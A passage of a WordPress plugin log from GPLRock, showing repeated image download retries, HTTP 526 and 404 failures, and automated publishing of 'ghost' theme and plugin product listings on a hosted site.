ID: dina-restaurant-cafe-food-theme [05-Apr-2026 06:54:26 UTC] GPLRock: Image download failed for product solarva-ecology-solar-energy-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:28 UTC] GPLRock: Image download failed for product solarva-ecology-solar-energy-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solarva---ecology--solar-energy-theme-16408.webp for product solarva-ecology-solar-energy-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:30 UTC] GPLRock: Image download failed for product solarva-ecology-solar-energy-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:32 UTC] GPLRock: Image download failed for product solarva-ecology-solar-energy-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/solarva---ecology--solar-energy-theme-16408.webp for product solarva-ecology-solar-energy-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:34 UTC] GPLRock WARNING: Image download failed for product solarva-ecology-solar-energy-theme. URL: https://meldwp.com/wp-content/uploads/solarva---ecology--solar-energy-theme-16408.webp [05-Apr-2026 06:54:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: solarva-ecology-solar-energy-theme [05-Apr-2026 06:54:34 UTC] GPLRock: Image downloaded successfully for product retro-portfolio-one-page-vintage-template (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ed243ff.webp [05-Apr-2026 06:54:34 UTC] GPLRock: Using pre-downloaded image for product retro-portfolio-one-page-vintage-template: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4ed243ff.webp [05-Apr-2026 06:54:34 UTC] GPLRock: Ghost product published with image - Product ID: retro-portfolio-one-page-vintage-template [05-Apr-2026 06:54:34 UTC] GPLRock: Image downloaded successfully for product eldon-artist-portfolio-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f4e7905.webp [05-Apr-2026 06:54:34 UTC] GPLRock: Using pre-downloaded image for product eldon-artist-portfolio-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7f4e7905.webp [05-Apr-2026 06:54:34 UTC] GPLRock: Ghost product published with image - Product ID: eldon-artist-portfolio-wordpress-theme [05-Apr-2026 06:54:35 UTC] GPLRock: Image download failed for product buny-kids-store-and-baby-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:37 UTC] GPLRock: Image download failed for product buny-kids-store-and-baby-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buny--kids-store-and-baby-shop-wordpress-theme-11069.webp for product buny-kids-store-and-baby-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:39 UTC] GPLRock: Image download failed for product buny-kids-store-and-baby-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:41 UTC] GPLRock: Image download failed for product buny-kids-store-and-baby-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buny--kids-store-and-baby-shop-wordpress-theme-11069.webp for product buny-kids-store-and-baby-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:43 UTC] GPLRock WARNING: Image download failed for product buny-kids-store-and-baby-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/buny--kids-store-and-baby-shop-wordpress-theme-11069.webp [05-Apr-2026 06:54:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: buny-kids-store-and-baby-shop-wordpress-theme [05-Apr-2026 06:54:43 UTC] GPLRock: Image download failed for product annova-survey-wizard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:45 UTC] GPLRock: Image download failed for product annova-survey-wizard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/annova---survey-wizard-29378.webp for product annova-survey-wizard after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:48 UTC] GPLRock: Image download failed for product annova-survey-wizard (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:50 UTC] GPLRock: Image download failed for product annova-survey-wizard (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/annova---survey-wizard-29378.webp for product annova-survey-wizard after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:52 UTC] GPLRock WARNING: Image download failed for product annova-survey-wizard. URL: https://meldwp.com/wp-content/uploads/annova---survey-wizard-29378.webp [05-Apr-2026 06:54:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: annova-survey-wizard [05-Apr-2026 06:54:52 UTC] GPLRock: Image download failed for product mal-modern-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:54 UTC] GPLRock: Image download failed for product mal-modern-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mal---modern-creative-agency-wordpress-theme-12385.webp for product mal-modern-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:54:56 UTC] GPLRock: Image download failed for product mal-modern-creative-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:54:58 UTC] GPLRock: Image download failed for product mal-modern-creative-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mal---modern-creative-agency-wordpress-theme-12385.webp for product mal-modern-creative-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:00 UTC] GPLRock WARNING: Image download failed for product mal-modern-creative-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mal---modern-creative-agency-wordpress-theme-12385.webp [05-Apr-2026 06:55:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mal-modern-creative-agency-wordpress-theme [05-Apr-2026 06:55:00 UTC] GPLRock: Image download failed for product mega-factory-industrial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:03 UTC] GPLRock: Image download failed for product mega-factory-industrial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mega-factory---industrial-wordpress-theme-9811.webp for product mega-factory-industrial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:05 UTC] GPLRock: Image download failed for product mega-factory-industrial-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:07 UTC] GPLRock: Image download failed for product mega-factory-industrial-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mega-factory---industrial-wordpress-theme-9811.webp for product mega-factory-industrial-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:09 UTC] GPLRock WARNING: Image download failed for product mega-factory-industrial-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mega-factory---industrial-wordpress-theme-9811.webp [05-Apr-2026 06:55:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mega-factory-industrial-wordpress-theme [05-Apr-2026 06:55:24 UTC] GPLRock: Image download failed for product songbook-music-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:26 UTC] GPLRock: Image download failed for product songbook-music-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/songbook---music-school-wordpress-theme-26188.webp for product songbook-music-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:29 UTC] GPLRock: Image download failed for product songbook-music-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:31 UTC] GPLRock: Image download failed for product songbook-music-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/songbook---music-school-wordpress-theme-26188.webp for product songbook-music-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:33 UTC] GPLRock WARNING: Image download failed for product songbook-music-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/songbook---music-school-wordpress-theme-26188.webp [05-Apr-2026 06:55:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: songbook-music-school-wordpress-theme [05-Apr-2026 06:55:33 UTC] GPLRock: Image download failed for product emo-focus-modern-lightweight-news-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:35 UTC] GPLRock: Image download failed for product emo-focus-modern-lightweight-news-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emo-focus---modern-lightweight-news-magazine-theme-8116.webp for product emo-focus-modern-lightweight-news-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:37 UTC] GPLRock: Image download failed for product emo-focus-modern-lightweight-news-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:39 UTC] GPLRock: Image download failed for product emo-focus-modern-lightweight-news-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emo-focus---modern-lightweight-news-magazine-theme-8116.webp for product emo-focus-modern-lightweight-news-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:42 UTC] GPLRock WARNING: Image download failed for product emo-focus-modern-lightweight-news-magazine-theme. URL: https://meldwp.com/wp-content/uploads/emo-focus---modern-lightweight-news-magazine-theme-8116.webp [05-Apr-2026 06:55:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emo-focus-modern-lightweight-news-magazine-theme [05-Apr-2026 06:55:42 UTC] GPLRock: Image download failed for product carsten-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:44 UTC] GPLRock: Image download failed for product carsten-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carsten---hotel-booking-wordpress-theme-13894.webp for product carsten-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:46 UTC] GPLRock: Image download failed for product carsten-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:48 UTC] GPLRock: Image download failed for product carsten-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carsten---hotel-booking-wordpress-theme-13894.webp for product carsten-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:50 UTC] GPLRock WARNING: Image download failed for product carsten-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/carsten---hotel-booking-wordpress-theme-13894.webp [05-Apr-2026 06:55:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: carsten-hotel-booking-wordpress-theme [05-Apr-2026 06:55:51 UTC] GPLRock: Image download failed for product nimbo-personal-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:53 UTC] GPLRock: Image download failed for product nimbo-personal-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nimbo---personal-wordpress-blog-theme-9398.webp for product nimbo-personal-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:55 UTC] GPLRock: Image download failed for product nimbo-personal-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:57 UTC] GPLRock: Image download failed for product nimbo-personal-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:55:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nimbo---personal-wordpress-blog-theme-9398.webp for product nimbo-personal-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:55:59 UTC] GPLRock WARNING: Image download failed for product nimbo-personal-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/nimbo---personal-wordpress-blog-theme-9398.webp [05-Apr-2026 06:55:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nimbo-personal-wordpress-blog-theme [05-Apr-2026 06:55:59 UTC] GPLRock: Image downloaded successfully for product askka-candle-shop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ee2c5b1.webp [05-Apr-2026 06:55:59 UTC] GPLRock: Using pre-downloaded image for product askka-candle-shop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ee2c5b1.webp [05-Apr-2026 06:55:59 UTC] GPLRock: Ghost product published with image - Product ID: askka-candle-shop-wordpress-theme [05-Apr-2026 06:55:59 UTC] GPLRock: Image download failed for product manit-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:01 UTC] GPLRock: Image download failed for product manit-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manit---it-solutions--technology-wordpress-theme-8504.webp for product manit-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:04 UTC] GPLRock: Image download failed for product manit-it-solutions-technology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:06 UTC] GPLRock: Image download failed for product manit-it-solutions-technology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/manit---it-solutions--technology-wordpress-theme-8504.webp for product manit-it-solutions-technology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:08 UTC] GPLRock WARNING: Image download failed for product manit-it-solutions-technology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/manit---it-solutions--technology-wordpress-theme-8504.webp [05-Apr-2026 06:56:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: manit-it-solutions-technology-wordpress-theme [05-Apr-2026 06:56:08 UTC] GPLRock: Image download failed for product houzing-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:10 UTC] GPLRock: Image download failed for product houzing-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/houzing--real-estate-wordpress-theme-27416.webp for product houzing-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:12 UTC] GPLRock: Image download failed for product houzing-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:14 UTC] GPLRock: Image download failed for product houzing-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/houzing--real-estate-wordpress-theme-27416.webp for product houzing-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:16 UTC] GPLRock WARNING: Image download failed for product houzing-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/houzing--real-estate-wordpress-theme-27416.webp [05-Apr-2026 06:56:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: houzing-real-estate-wordpress-theme [05-Apr-2026 06:56:17 UTC] GPLRock: Image download failed for product arlo-personal-portfolio-cv-resume-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:19 UTC] GPLRock: Image download failed for product arlo-personal-portfolio-cv-resume-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arlo---personal--portfolio--cv--resume-template-22833.webp for product arlo-personal-portfolio-cv-resume-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:21 UTC] GPLRock: Image download failed for product arlo-personal-portfolio-cv-resume-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:23 UTC] GPLRock: Image download failed for product arlo-personal-portfolio-cv-resume-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arlo---personal--portfolio--cv--resume-template-22833.webp for product arlo-personal-portfolio-cv-resume-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:25 UTC] GPLRock WARNING: Image download failed for product arlo-personal-portfolio-cv-resume-template. URL: https://meldwp.com/wp-content/uploads/arlo---personal--portfolio--cv--resume-template-22833.webp [05-Apr-2026 06:56:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arlo-personal-portfolio-cv-resume-template [05-Apr-2026 06:56:25 UTC] GPLRock: Image download failed for product rockon-dj-music-club-night-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:27 UTC] GPLRock: Image download failed for product rockon-dj-music-club-night-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rockon-dj---music-club--night-club-wordpress-theme-31577.webp for product rockon-dj-music-club-night-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:29 UTC] GPLRock: Image download failed for product rockon-dj-music-club-night-club-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:32 UTC] GPLRock: Image download failed for product rockon-dj-music-club-night-club-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rockon-dj---music-club--night-club-wordpress-theme-31577.webp for product rockon-dj-music-club-night-club-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:34 UTC] GPLRock WARNING: Image download failed for product rockon-dj-music-club-night-club-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rockon-dj---music-club--night-club-wordpress-theme-31577.webp [05-Apr-2026 06:56:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rockon-dj-music-club-night-club-wordpress-theme [05-Apr-2026 06:56:34 UTC] GPLRock: Image download failed for product magnis-corporate-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:36 UTC] GPLRock: Image download failed for product magnis-corporate-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magnis---corporate-multipurpose-wordpress-theme-30883.webp for product magnis-corporate-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:38 UTC] GPLRock: Image download failed for product magnis-corporate-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:40 UTC] GPLRock: Image download failed for product magnis-corporate-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:56:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magnis---corporate-multipurpose-wordpress-theme-30883.webp for product magnis-corporate-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:56:42 UTC] GPLRock WARNING: Image download failed for product magnis-corporate-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/magnis---corporate-multipurpose-wordpress-theme-30883.webp [05-Apr-2026 06:56:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: magnis-corporate-multipurpose-wordpress-theme [05-Apr-2026 06:57:05 UTC] GPLRock: Image downloaded successfully for product woocommerce-follow-up-emails (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dfd50eae.jpg [05-Apr-2026 06:57:05 UTC] GPLRock: Using pre-downloaded image for product woocommerce-follow-up-emails: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-dfd50eae.jpg [05-Apr-2026 06:57:05 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-follow-up-emails [05-Apr-2026 06:57:07 UTC] GPLRock: Image downloaded successfully for product woocommerce-one-page-checkout (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60c87ebd.jpg [05-Apr-2026 06:57:07 UTC] GPLRock: Using pre-downloaded image for product woocommerce-one-page-checkout: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-60c87ebd.jpg [05-Apr-2026 06:57:07 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-one-page-checkout [05-Apr-2026 06:57:08 UTC] GPLRock: Image downloaded successfully for product woocommerce-product-finder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61dd987e.jpg [05-Apr-2026 06:57:08 UTC] GPLRock: Using pre-downloaded image for product woocommerce-product-finder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-61dd987e.jpg [05-Apr-2026 06:57:08 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-product-finder [05-Apr-2026 06:57:10 UTC] GPLRock: Image downloaded successfully for product themeisle-shopisle-pro-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d2e3f15.jpg [05-Apr-2026 06:57:10 UTC] GPLRock: Using pre-downloaded image for product themeisle-shopisle-pro-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7d2e3f15.jpg [05-Apr-2026 06:57:10 UTC] GPLRock: Ghost product published with image - Product ID: themeisle-shopisle-pro-wordpress-theme [05-Apr-2026 06:57:12 UTC] GPLRock: Image downloaded successfully for product all-in-one-support-button-callback-request (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b28753cb.jpg [05-Apr-2026 06:57:12 UTC] GPLRock: Using pre-downloaded image for product all-in-one-support-button-callback-request: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b28753cb.jpg [05-Apr-2026 06:57:12 UTC] GPLRock: Ghost product published with image - Product ID: all-in-one-support-button-callback-request [05-Apr-2026 06:57:13 UTC] GPLRock: Image downloaded successfully for product nitan-fashion-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18d78bda.jpg [05-Apr-2026 06:57:13 UTC] GPLRock: Using pre-downloaded image for product nitan-fashion-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-18d78bda.jpg [05-Apr-2026 06:57:13 UTC] GPLRock: Ghost product published with image - Product ID: nitan-fashion-woocommerce-wordpress-theme [05-Apr-2026 06:57:15 UTC] GPLRock: Image downloaded successfully for product aelia-currency-switcher-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-33a6d602.jpg [05-Apr-2026 06:57:15 UTC] GPLRock: Using pre-downloaded image for product aelia-currency-switcher-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-33a6d602.jpg [05-Apr-2026 06:57:15 UTC] GPLRock: Ghost product published with image - Product ID: aelia-currency-switcher-for-woocommerce [05-Apr-2026 06:57:16 UTC] GPLRock: Image downloaded successfully for product admin-columns-pro-advanced-custom-fields-acf (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d93da96c.jpg [05-Apr-2026 06:57:16 UTC] GPLRock: Using pre-downloaded image for product admin-columns-pro-advanced-custom-fields-acf: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d93da96c.jpg [05-Apr-2026 06:57:16 UTC] GPLRock: Ghost product published with image - Product ID: admin-columns-pro-advanced-custom-fields-acf [05-Apr-2026 06:57:19 UTC] GPLRock: Image download failed for product essential-grid-gallery-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 06:57:23 UTC] GPLRock: Image download failed for product essential-grid-gallery-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 06:57:28 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Essential-Grid-WordPress-Plugin.jpg for product essential-grid-gallery-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 06:57:30 UTC] GPLRock: Image download failed for product essential-grid-gallery-wordpress-plugin (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 06:57:35 UTC] GPLRock: Image download failed for product essential-grid-gallery-wordpress-plugin (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 06:57:39 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/08/Essential-Grid-WordPress-Plugin.jpg for product essential-grid-gallery-wordpress-plugin after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 06:57:39 UTC] GPLRock WARNING: Image download failed for product essential-grid-gallery-wordpress-plugin. URL: https://www.gplrock.com/wp-content/uploads/2020/08/Essential-Grid-WordPress-Plugin.jpg [05-Apr-2026 06:57:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: essential-grid-gallery-wordpress-plugin [05-Apr-2026 06:57:41 UTC] GPLRock: Image downloaded successfully for product mythemeshop-moneyflow-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9000cb06.jpg [05-Apr-2026 06:57:41 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-moneyflow-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9000cb06.jpg [05-Apr-2026 06:57:41 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-moneyflow-wordpress-theme [05-Apr-2026 06:58:53 UTC] GPLRock: Image downloaded successfully for product madeline-virtual-assistant-website-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dbd0bf87.webp [05-Apr-2026 06:58:53 UTC] GPLRock: Using pre-downloaded image for product madeline-virtual-assistant-website-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dbd0bf87.webp [05-Apr-2026 06:58:53 UTC] GPLRock: Ghost product published with image - Product ID: madeline-virtual-assistant-website-elementor-template-kit [05-Apr-2026 06:58:54 UTC] GPLRock: Image downloaded successfully for product maco-kit-gym-fitness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-809e4961.webp [05-Apr-2026 06:58:54 UTC] GPLRock: Using pre-downloaded image for product maco-kit-gym-fitness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-809e4961.webp [05-Apr-2026 06:58:54 UTC] GPLRock: Ghost product published with image - Product ID: maco-kit-gym-fitness-elementor-template-kit [05-Apr-2026 06:58:56 UTC] GPLRock: Image downloaded successfully for product macello-business-consulting-accounting-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0d6475dd.webp [05-Apr-2026 06:58:56 UTC] GPLRock: Using 